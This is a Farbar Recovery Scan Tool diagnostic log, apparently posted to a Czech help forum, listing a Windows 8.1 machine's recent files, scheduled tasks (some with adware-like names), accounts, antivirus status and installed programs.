2019-07-01 10:11 - 2019-07-01 10:11 - 000000000 ____D C:\Users\Radim\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Discord Inc
2019-07-01 10:10 - 2019-07-01 10:11 - 000000000 ____D C:\Users\Radim\AppData\Local\SquirrelTemp
2019-07-01 10:10 - 2019-07-01 10:11 - 000000000 ____D C:\Users\Radim\AppData\Local\Discord
2019-07-01 10:09 - 2019-07-01 10:09 - 061370712 _____ (Discord Inc.) C:\Users\Radim\Downloads\DiscordSetup.exe

==================== One month (modified) ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2019-07-31 10:42 - 2017-05-16 13:09 - 000000000 ____D C:\Users\Radim\AppData\LocalLow\Mozilla
2019-07-31 10:42 - 2014-05-17 20:19 - 000000000 ____D C:\Users\Radim\AppData\Roaming\uTorrent
2019-07-31 10:36 - 2016-02-10 17:48 - 000000000 ____D C:\Users\Radim\AppData\Roaming\vlc
2019-07-31 10:22 - 2014-05-03 10:54 - 000003600 _____ C:\WINDOWS\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-2652530150-2383877666-4203637229-1007
2019-07-31 10:13 - 2019-04-05 19:51 - 000002810 _____ C:\WINDOWS\System32\Tasks\CCleanerSkipUAC
2019-07-31 10:13 - 2018-03-15 18:57 - 000004530 _____ C:\WINDOWS\System32\Tasks\Adobe Flash Player NPAPI Notifier
2019-07-31 10:13 - 2017-05-14 21:06 - 000006066 _____ C:\WINDOWS\System32\Tasks\Wotustupocult Controls
2019-07-31 10:13 - 2017-01-30 20:35 - 000003150 _____ C:\WINDOWS\System32\Tasks\{13B27974-850F-429D-8474-B89E6AB4248F}
2019-07-31 10:13 - 2016-05-04 16:58 - 000001844 _____ C:\WINDOWS\System32\Tasks\{05CD7012-09EF-4D71-BB5D-4054E9B7C3DC}
2019-07-31 10:13 - 2016-05-03 20:01 - 000001708 _____ C:\WINDOWS\System32\Tasks\{C9E0EEC1-BDC8-45D5-8B41-CCC7817DD33A}
2019-07-31 10:13 - 2015-10-18 13:21 - 000001710 _____ C:\WINDOWS\System32\Tasks\{D20BA10B-ED49-4FFF-8443-5FFA687CC72A}
2019-07-31 10:13 - 2015-08-19 21:12 - 000004358 _____ C:\WINDOWS\System32\Tasks\Adobe Flash Player PPAPI Notifier
2019-07-31 10:13 - 2015-08-19 21:12 - 000004236 _____ C:\WINDOWS\System32\Tasks\Adobe Flash Player Updater
2019-07-31 10:13 - 2014-11-26 21:22 - 000002108 _____ C:\WINDOWS\System32\Tasks\BrickEnforcer-S-1910914952
2019-07-31 10:13 - 2014-11-26 21:22 - 000000536 ____H C:\WINDOWS\Tasks\BrickEnforcer-S-1910914952.job
2019-07-31 10:13 - 2014-05-03 11:00 - 000003830 _____ C:\WINDOWS\System32\Tasks\User_Feed_Synchronization-{73E8F541-BE16-471F-9D66-FB2B6A5B539C}
2019-07-31 10:13 - 2014-04-30 11:20 - 000002794 _____ C:\WINDOWS\System32\Tasks\User_Feed_Synchronization-{059DD3C0-0B7A-4B9B-BF0B-C04E115C228F}
2019-07-31 10:13 - 2014-04-29 13:22 - 000002040 _____ C:\WINDOWS\System32\Tasks\CreateChoiceProcessTask
2019-07-31 10:13 - 2014-04-29 10:03 - 000002888 _____ C:\WINDOWS\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-2652530150-2383877666-4203637229-1001
2019-07-31 01:12 - 2014-05-03 10:48 - 000000000 __SHD C:\Users\Radim\IntelGraphicsProfiles
2019-07-31 01:11 - 2016-05-18 19:52 - 000000049 ___SH C:\WINDOWS\SysWOW64\mmf.sys
2019-07-31 01:11 - 2013-08-22 16:45 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2019-07-31 01:09 - 2014-05-03 10:48 - 000000000 ____D C:\Users\Radim
2019-07-31 01:07 - 2015-09-25 15:00 - 000000000 ____D C:\Users\Radim\AppData\Roaming\IObit
2019-07-31 01:07 - 2015-09-25 15:00 - 000000000 ____D C:\ProgramData\IObit
2019-07-31 01:06 - 2017-05-16 13:06 - 000000000 ____D C:\WINDOWS\system32\log
2019-07-31 01:06 - 2015-09-25 15:00 - 000000000 ____D C:\Users\Radim\AppData\LocalLow\IObit
2019-07-30 09:46 - 2014-08-07 09:15 - 000539648 ___SH C:\Users\Radim\Downloads\Thumbs.db
2019-07-30 09:40 - 2014-03-18 17:33 - 001742514 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2019-07-30 09:40 - 2014-03-18 16:54 - 000735548 _____ C:\WINDOWS\system32\perfh005.dat
2019-07-30 09:40 - 2014-03-18 16:54 - 000149356 _____ C:\WINDOWS\system32\perfc005.dat
2019-07-30 09:40 - 2013-08-22 15:36 - 000000000 ____D C:\WINDOWS\Inf
2019-07-30 01:55 - 2013-08-22 17:36 - 000000000 ____D C:\WINDOWS\system32\NDF
2019-07-30 00:41 - 2014-04-30 12:49 - 000000000 ____D C:\Program Files (x86)\ATI Technologies
2019-07-30 00:36 - 2014-04-29 14:28 - 000000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Productivity and Tools
2019-07-30 00:35 - 2014-04-30 12:49 - 000000000 ____D C:\ProgramData\Package Cache
2019-07-30 00:32 - 2014-04-29 13:26 - 000000000 ____D C:\SWSetup
2019-07-29 23:53 - 2016-02-10 17:46 - 000000887 _____ C:\Users\Public\Desktop\VLC media player.lnk
2019-07-29 23:52 - 2014-05-03 11:35 - 000425472 ___SH C:\Users\Radim\Desktop\Thumbs.db
2019-07-29 23:44 - 2019-04-05 19:50 - 000000836 _____ C:\Users\Public\Desktop\CCleaner.lnk
2019-07-29 21:50 - 2012-07-26 09:59 - 000000000 ____D C:\WINDOWS\CbsTemp
2019-07-29 21:40 - 2013-08-22 16:44 - 000400512 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2019-07-29 21:33 - 2014-12-09 22:20 - 000000000 ____D C:\WINDOWS\system32\appraiser
2019-07-29 21:33 - 2013-08-22 17:36 - 000000000 ___RD C:\WINDOWS\ToastData
2019-07-29 21:33 - 2013-08-22 17:36 - 000000000 ____D C:\WINDOWS\PolicyDefinitions
2019-07-29 21:33 - 2013-08-22 15:36 - 000000000 ____D C:\WINDOWS\SysWOW64\Dism
2019-07-29 21:33 - 2013-08-22 15:36 - 000000000 ____D C:\WINDOWS\system32\Dism
2019-07-29 21:27 - 2014-04-30 12:53 - 000000000 ____D C:\Program Files\AMD
2019-07-29 21:18 - 2014-04-29 10:08 - 000000000 ____D C:\Program Files (x86)\Intel
2019-07-29 21:07 - 2014-04-29 10:30 - 136618864 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2019-07-27 03:40 - 2013-08-22 17:36 - 000000000 ____D C:\WINDOWS\AppReadiness
2019-07-26 22:04 - 2017-05-18 13:06 - 000000000 ____D C:\Reimward
2019-07-26 22:02 - 2014-10-30 20:48 - 000000000 ____D C:\ProgramData\421e43cc-ed79-4e60-91b6-5efd8c307dd0
2019-07-26 19:46 - 2017-05-14 21:06 - 000000000 ____D C:\Program Files (x86)\Cooferlydrefeght
2019-07-24 13:39 - 2017-05-14 21:06 - 000000000 ____D C:\Program Files (x86)\Wotustupocult Controls
2019-07-24 13:39 - 2014-11-26 21:20 - 000000000 ____D C:\ProgramData\fnnegffbdniflckhmjifljomfnnjhhgd
2019-07-24 13:00 - 2013-08-22 15:36 - 000000000 ____D C:\Program Files\Magic Fortune XML Converter
2019-07-24 11:49 - 2017-05-24 10:11 - 000000000 ____D C:\Users\Radim\AppData\Local\snare
2019-07-24 11:49 - 2017-05-18 13:07 - 000000000 ____D C:\Users\Radim\AppData\Local\CSHMDR
2019-07-24 11:49 - 2017-05-16 01:07 - 000000000 ____D C:\Users\Radim\AppData\Local\CWASRE
2019-07-19 17:36 - 2013-08-22 17:36 - 000000000 ___HD C:\Program Files\WindowsApps
2019-07-09 10:28 - 2013-08-22 17:36 - 000000000 ____D C:\WINDOWS\SysWOW64\Macromed
2019-07-09 10:28 - 2013-08-22 17:36 - 000000000 ____D C:\WINDOWS\system32\Macromed
2019-07-09 10:00 - 2019-06-12 16:54 - 000000000 ____D C:\Users\Radim\Desktop\World of Warcraft Cataclysm 4.3.4
2019-07-09 09:52 - 2019-05-22 20:10 - 000000000 ____D C:\Users\Radim\Downloads\NovĂˇ sloĹľka
2019-07-04 10:07 - 2014-05-03 11:09 - 000000000 ____D C:\Users\Radim\AppData\Roaming\Skype

==================== Files in the root of some directories ================

2017-12-14 20:34 - 2018-03-20 22:22 - 000020800 _____ () C:\Users\Radim\AppData\Roaming\downloads.json
2016-11-20 15:47 - 2016-11-20 17:19 - 000005120 _____ () C:\Users\Radim\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2019-02-01 02:25 - 2019-04-16 11:00 - 000007597 _____ () C:\Users\Radim\AppData\Local\Resmon.ResmonCfg

==================== SigCheck ===============================

(There is no automatic fix for files that do not pass verification.)

LastRegBack: 2016-05-17 06:49
==================== End of FRST.txt ============================

kovadlina11 · #7 Příspěvek od **kovadlina11** » 31 črc 2019 09:51

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 30-07-2019 01
Ran by Radim (31-07-2019 10:43:37)
Running from C:\Users\Radim\Desktop
Windows 8.1 (Update) (X64) (2014-04-29 14:03:09)
Boot Mode: Normal
==========================================================

==================== Accounts: =============================

Administrator (S-1-5-21-2652530150-2383877666-4203637229-500 - Administrator - Disabled)
Guest (S-1-5-21-2652530150-2383877666-4203637229-501 - Limited - Enabled)
HomeGroupUser$ (S-1-5-21-2652530150-2383877666-4203637229-1008 - Limited - Enabled)
Radim (S-1-5-21-2652530150-2383877666-4203637229-1007 - Administrator - Enabled) => C:\Users\Radim
Spravce (S-1-5-21-2652530150-2383877666-4203637229-1001 - Administrator - Enabled) => C:\Users\Spravce

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Avast Antivirus (Enabled - Up to date) {8EA8924E-BC81-DC44-8BB0-8BAE75D86EBF}
AS: Avast Antivirus (Enabled - Up to date) {35C973AA-9ABB-D3CA-B100-B0DC0E5F2402}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

ÂµTorrent (HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\...\uTorrent) (Version: 3.4.2.31536 - BitTorrent Inc.)
7-Zip 9.25 (x64 edition) (HKLM\...\{23170F69-40C1-2702-0925-000001000000}) (Version: 9.25.00.0 - Igor Pavlov)
Adobe Flash Player 32 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 32.0.0.223 - Adobe)
Adobe Flash Player 32 PPAPI (HKLM-x32\...\Adobe Flash Player PPAPI) (Version: 32.0.0.223 - Adobe)
Adobe Reader XI (11.0.06) - Czech (HKLM-x32\...\{AC76BA86-7AD7-1029-7B44-AB0000000001}) (Version: 11.0.06 - Adobe Systems Incorporated)
AGEIA PhysX v2.5.1 (HKLM-x32\...\AGEIA PhysX v2.5.1) (Version: - )
AMD Catalyst Install Manager (HKLM\...\{F2A7CE36-57BF-5C86-952D-90DBF3746D82}) (Version: 8.0.916.0 - Advanced Micro Devices, Inc.)
Apple Application Support (HKLM-x32\...\{83CAF0DE-8D3B-4C37-A631-2B8F16EC3031}) (Version: 3.1 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{BDD99690-3541-4619-9D2A-3CDDB3E15F9E}) (Version: 8.0.5.6 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
ASIO4ALL (HKLM-x32\...\ASIO4ALL) (Version: 2.10 - Michael Tippach)
Audacity 2.1.0 (HKLM-x32\...\Audacity_is1) (Version: 2.1.0 - Audacity Team)
Avast Free Antivirus (HKLM-x32\...\Avast Antivirus) (Version: 19.6.2383 - AVAST Software)
Avira (HKLM-x32\...\{0696cc37-db90-4000-be99-4a173ca7c8af}) (Version: 1.1.39.17987 - Avira Operations GmbH & Co. KG)
Boiling Point - Cesta do pekel (HKLM-x32\...\{BPOINT_02082005}) (Version: - )
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
Brothers in Arms - PekelnĂˇ dĂˇlnice (HKLM-x32\...\Brothers in Arms - Hell's Highway) (Version: 1.0.0.0 - Ubisoft)
Brothers In Arms (HKLM-x32\...\BrothersInArms) (Version: - Ubisoft)
Call of Duty (HKLM-x32\...\Call of Duty) (Version: - )
Call of Juarez - Bound in Blood (HKLM-x32\...\{019908AA-79E9-4389-A1AD-8BBEED63CFBA}) (Version: 1.01.0000 - Ubisoft) Hidden
Call of Juarez - Bound in Blood (HKLM-x32\...\InstallShield_{019908AA-79E9-4389-A1AD-8BBEED63CFBA}) (Version: 1.01.0000 - Ubisoft)
CCleaner (HKLM\...\CCleaner) (Version: 5.60 - Piriform)
Combined Community Codec Pack 2014-03-09 (HKLM-x32\...\Combined Community Codec Pack_is1) (Version: 2014.03.09.0 - CCCP Project)
Counter-Strike 1.6 (HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\...\Counter-Strike 1.6) (Version: - )
Counter-strike source v18 (HKLM-x32\...\urna css_is1) (Version: - )
CyberLink Media Suite 10 (HKLM-x32\...\InstallShield_{1FBF6C24-C1fD-4101-A42B-0C564F9E8E79}) (Version: 10.0.1.1916 - CyberLink Corp.)
CyberLink PhotoDirector (HKLM-x32\...\InstallShield_{4862344A-A39C-4897-ACD4-A1BED5163C5A}) (Version: 2.0.1.3109 - CyberLink Corp.)
CyberLink PowerDirector 10 (HKLM-x32\...\InstallShield_{B0B4F6D2-F2AE-451A-9496-6F2F6A897B32}) (Version: 10.0.1.2006 - CyberLink Corp.)
DAEMON Tools Lite (HKLM\...\DAEMON Tools Lite) (Version: 10.3.0.0154 - Disc Soft Ltd)
Discord (HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\...\Discord) (Version: 0.0.305 - Discord Inc.)
EAX4 Unified Redist (HKLM-x32\...\{89661B04-C646-4412-B6D3-5E19F02F1F37}) (Version: 4.001 - Creative Labs)
F.3.A.R. 1.0 (HKLM-x32\...\F.3.A.R._is1) (Version: 1.0 - ĂŤĂ®Ă˘Ĺ±Ă© Ă„ÄŤĹ„Ä™)
Facebook Gameroom 1.21.6907.27509 (HKLM-x32\...\{E34773A0-158F-4322-8849-2C13BBCD6C68}) (Version: 1.21.6907.27509 - Facebook)
Far Manager 3 x64 (HKLM\...\{07F443EE-AE69-49FA-92DA-A4A488501F6D}) (Version: 3.0.3800 - Eugene Roshal & Far Group)
FL Studio 11 (HKLM-x32\...\FL Studio 11) (Version: - Image-Line)
FlowStone FL 3.0 (HKLM-x32\...\FlowStone) (Version: - )
Google Earth (HKLM-x32\...\{4D2A6330-2F8B-11E3-9C40-B8AC6F97B88E}) (Version: 7.1.2.2041 - Google)
Governor of Poker 2 Premium Edition v1.0 Multi (HKLM-x32\...\{8BF806C4-2D77-4F67-8435-D4BDCEB665A8}_is1) (Version: - My Company, Inc.)
Grand Theft Auto Vice City (HKLM-x32\...\{4B35F00C-E63D-40DC-9839-DF15A33EAC46}) (Version: 1.00.000 - )
Hewlett-Packard ACLM.NET v1.2.0.0 (HKLM-x32\...\{6F340107-F9AA-47C6-B54C-C3A19F11553F}) (Version: 1.00.0000 - Hewlett-Packard Company) Hidden
HP 3D DriveGuard (HKLM\...\{96E71D78-8F36-44E8-9F5C-900F1DF6E3B3}) (Version: 5.1.5.1 - Hewlett-Packard Company)
HP ESU for Microsoft Windows 8 (HKLM-x32\...\{50F16F43-54B8-43DB-B96F-255546DFB990}) (Version: 1.0.1.1 - Hewlett-Packard Company)
HP HD Webcam Driver (HKLM-x32\...\{399C37FB-08AF-493B-BFED-20FBD85EDF7F}) (Version: 6.0.1112.2_WHQL - Sonix)
HP Software Framework (HKLM-x32\...\{A3B77E0C-B157-4521-BAF1-C0E69F3D3204}) (Version: 4.6.8.1 - Hewlett-Packard Company)
HP Support Assistant (HKLM-x32\...\{FF27F674-821E-4BA2-985B-DDF539C2CD03}) (Version: 7.0.33.6 - Hewlett-Packard Company)
HP System Default Settings (HKLM-x32\...\{987210BB-D707-48FC-88FA-4374765D108D}) (Version: 2.0.1 - Hewlett-Packard Company)
HP Wireless Button Driver (HKLM-x32\...\{30B2D1D8-0A07-4B71-9553-0710C5D31E35}) (Version: 1.1.2.1 - Hewlett-Packard Company)
HP Wireless Hotspot (HKLM-x32\...\{A161E705-44B9-4B5F-A5F8-8E5847AEA86B}) (Version: 1.0.24.1 - Hewlett-Packard Company)
IDT Audio (HKLM-x32\...\{E3A5A8AB-58F6-45FF-AFCB-C9AE18C05001}) (Version: 1.0.6435.0 - IDT)
IL Shared Libraries (HKLM-x32\...\IL Shared Libraries) (Version: - Image-Line)
Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 8.1.30.1349 - Intel Corporation)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.4276 - Intel Corporation)
Intel(R) Rapid Storage Technology (HKLM-x32\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 11.6.5.1006 - Intel Corporation)
IrfanView (remove only) (HKLM-x32\...\IrfanView) (Version: 4.37 - Irfan Skiljan)
Java 7 Update 55 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F86417055FF}) (Version: 7.0.550 - Oracle)
Java 7 Update 55 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83217055FF}) (Version: 7.0.550 - Oracle)
JMicron Flash Media Controller Driver (HKLM-x32\...\{26604C7E-A313-4D12-867F-7C6E7820BE4C}) (Version: 1.0.76.1 - JMicron Technology Corp.)
League of Legends (HKLM-x32\...\League of Legends 1.0) (Version: 1.0 - Riot Games, Inc)
LibreOffice 4.2 Help Pack (Czech) (HKLM-x32\...\{169A0326-8F84-4E21-8D8A-6B4CE5DC24C8}) (Version: 4.2.1.1 - The Document Foundation)
LibreOffice 4.2.1.1 (HKLM-x32\...\{C83C3B4C-1AFF-4CEA-8078-74E7A3FE8F03}) (Version: 4.2.1.1 - The Document Foundation)
Mafia Classic Mod Deluxe (HKLM-x32\...\Mafia Classic Mod Deluxe) (Version: 1.3 - 4Way)
Mafia II (HKLM-x32\...\Mafia II_is1) (Version: - )
Mafia II Music Manager (HKLM-x32\...\Mafia II Music Manager_is1) (Version: 1.1.0.0 - Gottfried & ThielHater)
Medal of Honor: Pacific Assaultâ„˘ (HKLM-x32\...\{56CFA833-F44F-4199-8C58-7F8B38F2BC7B}) (Version: 1.2.1.281 - Electronic Arts)
Microsoft Games for Windows - LIVE Redistributable (HKLM-x32\...\{59E4543A-D49D-4489-B445-473D763C79AF}) (Version: 2.0.672.0 - Microsoft Corporation)
Microsoft PowerPoint Viewer (HKLM-x32\...\{95140000-00AF-0405-0000-0000000FF1CE}) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50918.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.21022 (HKLM\...\{350AA351-21FA-3270-8B7A-835434E766AD}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.50727 (HKLM-x32\...\{15134cb0-b767-4960-a911-f2d16ae54797}) (Version: 11.0.50727.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.50727 (HKLM-x32\...\{22154f09-719a-4619-bb71-5b3356999fbf}) (Version: 11.0.50727.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24212 (HKLM-x32\...\{323dad84-0974-4d90-a1c1-e006c7fdbb7d}) (Version: 14.0.24212.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24212 (HKLM-x32\...\{462f63a8-6347-4894-a1b3-dbfe3a4c981d}) (Version: 14.0.24212.0 - Microsoft Corporation)
Microsoft WSE 3.0 Runtime (HKLM-x32\...\{E3E71D07-CD27-46CB-8448-16D4FB29AA13}) (Version: 3.0.5305.0 - Microsoft Corp.)
Mission Pack (HKLM-x32\...\Mafia Mission Pack_is1) (Version: - Mission Pack)
Mozilla Firefox 68.0.1 (x64 cs) (HKLM\...\Mozilla Firefox 68.0.1 (x64 cs)) (Version: 68.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 68.0.1 - Mozilla)
Need For Speed Carbon Collectors Edition verze 1.4 (HKLM-x32\...\{8AA04B9B-B73E-4EB8-9837-9D7D1A222BA2}_is1) (Version: 1.4 - Electronic Arts)
NHLÂ® 09 (HKLM-x32\...\{F2B5A2A7-2DF9-4361-8BD5-362714528B51}) (Version: 2.0.1.0 - Electronic Arts)
NVIDIA PhysX (HKLM-x32\...\{8B922CF8-8A6C-41CE-A858-F1755D7F5D29}) (Version: 9.12.1031 - NVIDIA Corporation)
Opera Stable 45.0.2552.812 (HKLM-x32\...\Opera 45.0.2552.812) (Version: 45.0.2552.812 - Opera Software)
Opera Stable 62.0.3331.99 (HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\...\Opera 62.0.3331.99) (Version: 62.0.3331.99 - Opera Software)
Origin (HKLM-x32\...\Origin) (Version: 10.5.14.38647 - Electronic Arts, Inc.)
PANZERS - Phase II - Demo (Tunis) (HKLM-x32\...\PANZERS - Phase II - Demo (Tunis)) (Version: - )
PDFCreator (HKLM-x32\...\{0001B4FD-9EA3-4D90-A79E-FD14BA3AB01D}) (Version: 1.7.2 - pdfforge)
PX Profile Update (HKLM-x32\...\{1DC931E3-5F02-910B-75BF-74E002C89C69}) (Version: 1.00.1. - AMD) Hidden
Realtek Ethernet Controller All-In-One Windows Driver (HKLM-x32\...\{F7E7F0CB-AA41-4D5A-B6F2-8E6738EB063F}) (Version: 8.2.612.2012 - Realtek)
Rockstar Games Social Club (HKLM-x32\...\{08B3869E-D282-424C-9AFC-870E04A4BA14}) (Version: 1.00.0000 - Rockstar Games)
S.T.A.L.K.E.R. - Call of Pripyat [v1.6.01] (HKLM-x32\...\{406FB8A4-F539-48A9-809C-F94706F9C9F6}_is1) (Version: 1.6.01 - CENEGA)
S.T.A.L.K.E.R. - Clear Sky [v1.0003] (HKLM-x32\...\S.T.A.L.K.E.R. - Clear Sky_is1) (Version: 1.0003 - Deep Silver)
Saints Row The Third (HKLM-x32\...\Saints Row The Third_is1) (Version: - )
Skypeâ„˘ 7.5 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 7.5.101 - Skype Technologies S.A.)
SpeedFan (remove only) (HKLM-x32\...\SpeedFan) (Version: - )
Spider-Man Movie DEMO (HKLM-x32\...\Spider-Man Movie DEMO) (Version: DEMO - Activision Publishing, Inc.)
Steam (HKLM-x32\...\{048298C9-A4D3-490B-9FF9-AB023A9238F3}) (Version: 1.0.0.0 - Valve Corporation)
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 17.0.18.25 - Synaptics Incorporated)
TeamViewer 11 (HKLM-x32\...\TeamViewer) (Version: 11.0.56083 - TeamViewer)
The GodfatherÂ® The Game (HKLM-x32\...\{1D2CF076-A63F-41A5-00A1-5924FADFAD9D}) (Version: - )
THE SETTLERS - DÄ›dictvĂ krĂˇlĹŻ (HKLM-x32\...\{8FDC1610-3FB5-4EF2-A0D0-CEDC3A525A25}) (Version: 1.00.0000 - Blue Byte)
Tropico 4 (HKLM-x32\...\Tropico 4_is1) (Version: - )
Unity Web Player (HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\...\UnityWebPlayer) (Version: 4.5.1f3 - Unity Technologies ApS)
Vietcong & Vietcong: Fist Alpha (HKLM-x32\...\{DCF5C463-BD5C-4982-91F9-2C3F8F9E9C88}) (Version: 1.06 - )
Vietcong 2 (HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\...\Vietcong 2) (Version: - )
VirtualDJ 8 (HKLM-x32\...\{C3FADEEE-3EA2-4205-A7DA-82B38FB857B0}) (Version: 8.2.3731.0 - Atomix Productions)
VLC media player (HKLM\...\VLC media player) (Version: 3.0.7.1 - VideoLAN)
Warcraft III (HKLM-x32\...\Warcraft III) (Version: - )
WinRAR 5.01 (32-bit) (HKLM-x32\...\WinRAR archiver) (Version: 5.01.0 - win.rar GmbH)
World of Tanks (HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\...\{1EAC1D02-C6AC-4FA6-9A44-96258C37C812eu}_is1) (Version: - Wargaming.net)

Packages:
=========
Hry -> C:\Program Files\WindowsApps\Microsoft.XboxLIVEGames_2.0.139.0_x64__8wekyb3d8bbwe [2014-03-18] (Microsoft Corporation) [MS Ad]
Hudba -> C:\Program Files\WindowsApps\Microsoft.ZuneMusic_2.6.672.0_x64__8wekyb3d8bbwe [2015-03-28] (Microsoft Corporation) [MS Ad]
Kinect for Windows Framework -> C:\Program Files\WindowsApps\Microsoft.WindowsPreview.Kinect.8.0_2.0.1410.19000_x64__8wekyb3d8bbwe [2015-03-28] (Microsoft Corporation)
Kinect for Windows Framework -> C:\Program Files\WindowsApps\Microsoft.WindowsPreview.Kinect.8.0_2.0.1410.19000_x86__8wekyb3d8bbwe [2015-03-28] (Microsoft Corporation)
Kinect for Windows Framework -> C:\Program Files\WindowsApps\Microsoft.WindowsPreview.Kinect.8.1_2.0.1410.19000_x64__8wekyb3d8bbwe [2015-03-28] (Microsoft Corporation)
Kinect for Windows Framework -> C:\Program Files\WindowsApps\Microsoft.WindowsPreview.Kinect.8.1_2.0.1410.19000_x86__8wekyb3d8bbwe [2015-03-28] (Microsoft Corporation)
MSN CestovĂˇnĂ -> C:\Program Files\WindowsApps\Microsoft.BingTravel_3.0.4.336_x64__8wekyb3d8bbwe [2015-07-18] (Microsoft Corporation) [MS Ad]
MSN Finance -> C:\Program Files\WindowsApps\Microsoft.BingFinance_3.0.4.344_x64__8wekyb3d8bbwe [2016-04-27] (Microsoft Corporation) [MS Ad]
MSN GurmĂˇnskĂ˝ svÄ›t -> C:\Program Files\WindowsApps\Microsoft.BingFoodAndDrink_3.0.4.336_x64__8wekyb3d8bbwe [2015-07-18] (Microsoft Corporation) [MS Ad]
MSN PoÄŤasĂ -> C:\Program Files\WindowsApps\Microsoft.BingWeather_3.0.4.350_x64__8wekyb3d8bbwe [2017-07-13] (Microsoft Corporation) [MS Ad]
MSN Sport -> C:\Program Files\WindowsApps\Microsoft.BingSports_3.0.4.345_x64__8wekyb3d8bbwe [2016-04-29] (Microsoft Corporation) [MS Ad]
